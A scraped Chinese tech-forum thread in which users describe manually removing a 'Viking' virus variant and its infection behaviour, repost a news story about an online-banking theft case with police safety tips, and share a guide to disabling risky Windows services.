结出:手动才是王道!!手动万岁。。在E时代,我们要发扬取长补短的做法,把杀软的效率化,全面化,结合人工的仔细,灵活。这样才能尽心尽力像对待生活那样对待电脑
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
在网上看了一下维金的免疫方法。突然想起什么。。经过自己内心激烈的思想斗争于是作出了以下决定:我做了个试验,先将C盘做了个ghost,然后双击一个感染文件,系统进程出现viking,然后被双击这个exe文件图标,大小恢复正常.进程里首先出来三个文件。ghost恢复恢复。。这下有点眉目了就是在病毒原有目录下建一些0字节txt文件,改成病毒进程名,如:logon_1.exe 伪装一下,把它们改成只读,然后一个一个的点exe文件,让EXE文件中的异常代码释放入内存,再结束相应进程说干就干。仿照先前三个文件在c:\windows\建立 logon_1.exe richdll.dll (有些维金版本不是这个dll名字,变种有不同。路径也不同。但原理相同)再在C:\windows\unistall下建立 RUNDL132.exe ,设只读找出所有exe文件,网上说过只感染27Kb到10mb的exe文件,可我的10多20mb的文件也中标了,再次证明不是网上说的那种viking。。。开始 一 一双击释放。。。。。就这样。。。就这样。。它们快乐地流浪,就这样。它们为爱歌唱。。。狼爱上。。。。啪!!完了跑题挨臭鸡蛋了。*.*不是。。我只是形容一下上千个文件一 一打开的漫长。。过了几个小时后。终于完成。。舒展下酸痛的腰。。重建图标缓存。。。。冷启动。。。。。。。。。。。大功告成。。。至此。全部viking一个不留已经很久没有这样fighting过了经过了这么长时间的周旋。已经对这个变种病毒的原理有初步了解。以下列出本人总结出的该病毒特征及清除方案:viking"维金"病毒 变种应该算一个木马。互联网高度发展的产物首先在被种植机器的系统盘下\windows目录下生成logon_1.exe RUNDL132.exe 还有一个dll文件,我的是richdll.dll,还有网上说的dll.dll vtd.dll什么五花八门的,反正就是dll文件,并加载入系统进程。删除不掉.这些文件相互关联,结束进程并删除后马上又会出现。自动禁用杀毒防火墙,并且感染防火墙文件然后调用net share 命令打开$ipc命名管道共享。以传播到局域网上其它机器上.释放出诸如 services. iexplore.
mhs.exe等文件,并修改注册表exe文件,网站链接,scr文件,未知(打开方式)文件,等常用文件的关联为iexplore.pif或以上的其它某个病毒程序.将exe文件改为自创的winfile文件类型,从而让每个exe文件运行时同时调用病毒,这招太狠了;更改文件查找检索方式关联为 ;把原本用rundll32.exe文件调用的程序,如网上邻居属性,通过注册表改为带有的命令行。在 Hkey_local_machine或hkey_current_user\software\microsoft\windows\currentversion\run键值下添加名为load等字样的木马加载项。在currentversion\logon下也有。。。另外还改了些其它键值,这些只是较明显的。检测可用驱动器。在其中生成_desktop.ini 或autorun.inf iexplore.pif 让双击操作变为“自动播放病毒”所以只能右击打开了。。。最最可恨的就是感染所有驱动器上大于大约27KB的exe文件。加上约60KB的数据,文件图标丢失,目的在于被清除病毒后通过exe文件复活,当调用该句柄时自我释放为logon_1.exe rundl132.exe并且恢复exe文件以便让它正常运行。。。同时会自动从网上下载多达几十种其它类型的病毒,QQ盗号木马,热门网络游戏木马。至此,taskmgr任务管理器一团糟。。因为木马众多会影响清除效率及难度,内存占用超大,危险系数也大。这点不得不佩服。。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
过了两天的日夜奋战,今天凌晨时终于把viking变种完全搞定。在之前在这里我也曾发过贴求助,但没有正确答案。所以在这里我把总结出的经验分享一下。以下是我前两天的遭遇:一次上网过后发现了一些可疑的进程。使用ecq-ps进程王来查看它们的路径,有些是病毒文件。有些则是通过正常系统进程如“svchost.exe csrss.exe“等作为勾子运行的dll和sys文件,我心里又想,这些小毛毒又来了,(我的系统装于04年,一直使用至今,中过无数次病毒,都被我统统搞定了,心想这次又来一个杀一个,来两个杀一双吧)。我用的双系统,重启进win98的dos手动删除以上路径的文件,再进winxp,删除以上文件相关的注册表键值。再进服务里边检查一下发现病毒残留的服务项目,还伪装得很好的。描述还和正常服务一个模样,什么管理系统应用程序的128位密钥传输的许可证服务。看了我都想笑。不过再看看源路径(文件名忘了)和依存关系,就露陷了。心想麻外行还可以。。二话不说machine\system\currentcontrol\sevices\下揪出来删!重启,观察进程。一切恢复正常。喝口水。看会网络电视休息了。。可是就在这时真正的死神出现了。系统进程里突然暴出NN多病毒进程。瑞星也被关闭了,有些是刚才的有些不是。我慌了。先删除染毒的瑞星。(是昨天才升级的最新版啊)急忙用刚才的方法反复查杀多次,但每次启动后不久又会出现。。。且在98的纯dos下删除病毒文件时提示access denied(拒绝访问)时应该是内存驻留型的。于是冷启动再用windowsPE启动盘启动光盘里的PE操作系统,我想,PE内核都不一样,我看你还咱办。于是在PE里边删除病毒文件,果然这次启动进程恢复正常了。恢复完注册表。我就打开讯雷看一下我下载的工具软件,结果,又中标了。。。我开始总结:应该是把EXE文件感染了。不然怎么会无端多出些病毒进程出来。于是仔细看目录,发现被感染的exe文件下有exe.exe扩展名的文件,比如是acdsee.exe就会有acdsee.exe.exe并且文件图标丢失(不是网上说的那种在同目录下生成_desktop.ini文件,那是老版维金。我这个也有_desktop.ini,不过在c:\下,而且在D盘还会生成autorun.inf 及iexplorer.pif文件) 于是删除所有*.exe.exe文件,再次光盘启动删毒。这下进程虽然又恢复正常了。但是桌面上大多数的图标变成白的了。。心想这下完了,病毒感染了大多数exe文件。很多年没有遇到这样了。我又不敢启动这些程序,一启动包又中标,于是我安卡巴。安了6。0307,升级最新,安全模式下扫,正常模式下扫。。扫不出一点东西。又安6。04XX 还安5XXbeta最新的了,中英文都安过了,,扫不出。。。。。。。。。怒火!!!!(网上明明说卡巴扫得到的,我想都是针对旧版维金吧)于是再来卖咖啡(mcafee),在线升级mcafee,扫描。。。结果卖咖啡也卖不脱。。。暴怒!!!!再于是找到金山、瑞星的专杀工具来,也是一个扫不到。。。狂怒!!!!。。我看了一下win98se\setup.exe的文件大小,和源光盘里的文件比较足足多了近60K。而且每个受感染的文件都同样多了近60K ,证明感染的是都是vking!!。。。江民的专杀工具能杀,不过还好我点停止点得快。。。因为我看了一下,它的所谓杀大多数都是删除!!!删除了我好几个exe文件呢。就算保留,保留下来的也是不能运行的僵尸文件。什么exe修复机根本不顶用。一边凉快!!这下完了。绝望。这么多exe文件,打死我也不愿意格盘删'除。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5076排&&名:0劳动点:470排&&名:0发帖数:72 军号:258960 工分:5076
左箭头-小图标
3、定时清理垃圾文件1.在控制面板的计划任务的窗口中双击“添加计划任务”. 在打开“任务计划向导”窗口中点击“下一步”然后点击“浏览”在窗口中找到刚才制作的批处理文件,以下的就不用孝了吧能不能教教下一步该怎么操作?俺菜的很。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:16526排&&名:0劳动点:16288排&&名:0发帖数:7008 军号:785634 头衔:中南海卫兵队长 工分:16526
左箭头-小图标
&以下是引用秘书的发言:给计算机专业学生的忠告!
适用对象:计算机科学与技术的同学和其他专业想转计算级专业或者极其爱好计算级专业的同学。
一、给计算机专业的同学
1.首先请你热爱这个专业。只有这样,你才会从抽象的理论中找到实实在在的快乐。如果你不热爱她,或者只因为这是个热门专业,那么极力要求你放弃这个专业,因为计算机是一把双刃剑,学好了你会飞黄腾达,学不好你毕业后会极其痛苦,高不成低不就,没有发展潜力,如同学英语专业的人到了美国一样。
2.不要用功利眼光对待这个学科,这绝对不是点点鼠标就能挣钱的专......这个~`我都不知道怎么办了
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
震惊上海银行业的建设银行VIP客户16.6万余元资金网上被盗案,已由上海警方侦破。上海警方称,犯罪嫌疑人白某和葛某在云南昆明落入法网。VIP账户16万元“失踪”3月10日,建行客户蔡中向上海公安局卢湾分局报案称其2张信用卡内的16.6万余元被盗。据悉,蔡中是上海一家软件公司的总经理,而且是建行上海分行的VIP客户。当日,蔡中无意中发现,自己银证通账户下显示资金余额只有36.62元,而不是本应该有的16万余元的余额。警方通过查询银行转账记录,查明蔡中的2张信用卡被犯罪嫌疑人通过网上银行分11次转出人民币共计163014元(不包括转账手续费),被盗资金全部转入一个开户在昆明的建行活期账户内,并已被人取走。大盗在淘宝网上传黑客病毒在云南警方的大力协助下,侦查员很快查明活期账联系电话与联系地址均为虚假。同时,查明犯罪嫌疑人实施网上盗划的行为地,在昆明金沙小区金春苑某室,并进一步查明该室实际居住人是白某和葛某。3月28日,专案组侦查员通过守候伏击抓获了犯罪嫌疑人白某和葛某,并查获了作案用的电脑和部分赃物。经查,犯罪嫌疑人白某、葛某均为云南昆明当地人,大学文化。其中,白某在昆明一家科技公司的软件开发部工作,会编程序,平时对黑客软件兴趣较浓。据白某交代,她先在网上找他人的求职信息,获取他人的身份信息和联系方法,伪造了一张身份证,用该身份证在建行开户。白某在淘宝网上利用发送信息之际,将病毒植入他人电脑,进而获取了他人的银行账号、密码和认证证书,同时修改密码,盗取银行账户资金。目前,两人已被刑拘,案件正在进一步侦查中。警方:“五招”防网银大盗警方提醒,网民在上网时要注意自我保护:1、避免访问非法网站。2、在登录一些金融机构网站时,应直接输入域名,不要通过链接进入。3、不要打开不明来源的电子邮件4、上网时对个人信息注意保密,不要将聊天、论坛的密码设置与自己银行、证券账户的密码相同。5、不要在公共场所登录网上银行等一些金融机构的网站,防止重要信息被盗。银行:警惕5种网银诈骗形式建行提醒一些常见的诈骗形式需要防范:1、告知您的银行卡被异地盗用,需要签约网上银行;2、告知您的账户涉嫌洗钱,需要签约网上银行;3、告知能为您办理银行无抵押、无担保或低息贷款时,需要签约网上银行进行验资;4、与他人做生意,需要您预存保证金,并签约网上银行进行验资;5、通过地下钱庄放高利贷等投资项目,正在筹集资金阶段,需要您存入资金,签约网上银行。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
该服务提供RPC支持以及文件、打印和命名管道共享。Server服务是作为文件系统驱动器来实现的,可以处理I/O请求。如果用户没有提供适当的保护,会暴露系统文件和打印机资源。对于Windows 2000系统而言,这是一个高风险服务。Windows 2000中默认共享的存在就是该服务的问题。如果不禁用该服务,每次注销系统或开机后,默认共享就会打开,你的所有重要信息都将暴露出来。同时,由于很多Windows 2000使用者为了使用方便把管理员密码设置为空密码或非常简单的密码组合,这给了黑客可乘之机。在此提醒大家,除非你打算在Windows网络上共享文件或打印机,否则就不要运行该服务。Workstation危害种类:信息泄露危害系数:★★★该服务以一个文件系统驱动器的形式工作,并且可以允许用户访问位于Windows网络上的资源。该服务应当只在位于某个内部网络中并受到某个防火墙保护的工作站和服务器上运行。在任何可以连接到Internet的服务器上都应该禁用这个服务。需要提醒大家的是一些独立服务器(例如Web服务器)是不应当加入到某个Windows网络中的。TCP/IP NetBIOS Helper Service危害种类:恶意攻击危害系数:★★★★在Windows构建的网络中,每一台主机的唯一标志信息是它的NetBIOS名。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。在这样的网络内部,利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上,它就和一个后门程序差不多了。它很有可能暴露出当前系统中的NetBIOS安全性弱点,例如大家所熟悉的139端口入侵就是利用了此服务。由于NetBIOS是基于局域网的,因此,只需要访问Internet资源的一般用户可以禁用它,除非你的系统处于局域网中。Terminal Services危害种类:恶意攻击危害系数:★★★★★该服务提供多会话环境,允许客户端设备访问虚拟的系统桌面会话以及运行在服务器上的基于Windows的程序并打开默认为3389的对外端口,允许外来IP的连接(著名的3389攻击所依靠的服务就是它)。对于这个非常危险的服务,只有“禁用”。配置服务的方法:进入“服务”窗口,右键点击要配置的服务,然后点击“属性”。可根据需要在“常规”选项卡中,点击“自动”、“手动”或“已禁用”。这么多有安全隐患的服务如果没有被广大的个人服务器爱好者所关注,那么黑客入侵简直是易如反掌,服务器被攻占只是迟早的事。笔者在此提醒大家,不要忽略一切看似微不足道的设置,其实合理运用Windows自身的安全机制,也能很好地提升服务器的安全系数。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
这个服务允许任何已连
